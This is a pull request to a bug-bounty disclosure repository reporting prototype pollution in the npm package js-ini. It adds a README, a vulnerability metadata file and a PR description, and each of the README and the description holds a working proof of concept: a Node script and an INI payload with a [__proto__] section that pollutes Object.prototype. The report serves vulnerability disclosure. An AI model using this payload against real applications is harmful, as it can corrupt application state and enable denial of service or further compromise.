### PR TITLE
Prototype Pollution in js-ini

### DIFF
--- a/bounties/npm/js-ini/1/README.md
+++ b/bounties/npm/js-ini/1/README.md
@@ -1,0 +1,34 @@
+# Description
+
+`js-ini` is vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC and INI files:
+
+```
+// poc.js
+var fs = require('fs')
+var ini = require('js-ini')
+console.log("Before : " + {}.polluted);
+var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
+console.log("After : " + {}.polluted);
+
+//payload.ini
+[__proto__]
+polluted = "Yes! Its Polluted"
+```
+
+
+2. Execute the following commands in terminal:
+
+```
+npm i js-ini # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : "Yes! Its Polluted"
+```

--- a/bounties/npm/js-ini/1/vulnerability.json
+++ b/bounties/npm/js-ini/1/vulnerability.json
@@ -1,0 +1,56 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-12-11",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "js-ini",
+        "URL": "https://www.npmjs.com/package/js-ini",
+        "Downloads": "289"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS":
+    {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/Sdju/js-ini",
+        "Codebase": [
+            "TypeScript"
+        ],
+        "Owner": "Sdju",
+        "Name": "js-ini",
+        "Forks": 2,
+        "Stars": 7
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [],
+    "PrNumber": "1368"
+}


### PR DESCRIPTION
## ✍️ Description

`js-ini` is vulnerable to `Prototype Pollution`.

## 🕵️‍♂️ Proof of Concept

# Steps To Reproduce-:  

1. Create the following PoC and INI files:

```
// poc.js
var fs = require('fs')
var ini = require('js-ini')
console.log("Before : " + {}.polluted);
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log("After : " + {}.polluted);
//payload.ini
[__proto__]
polluted = "Yes! Its Polluted"
```


2. Execute the following commands in terminal:

```
npm i js-ini # Install affected module
node poc.js #  Run the PoC
```

3. Check the Output:
```
Before : undefined
After : "Yes! Its Polluted"
```


## 💥 Impact

It may lead to Information Disclosure/DoS/RCE.

## ✅ Checklist

<!-- Please put an `x` in each box to confirm you have completed the checklist. -->

**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_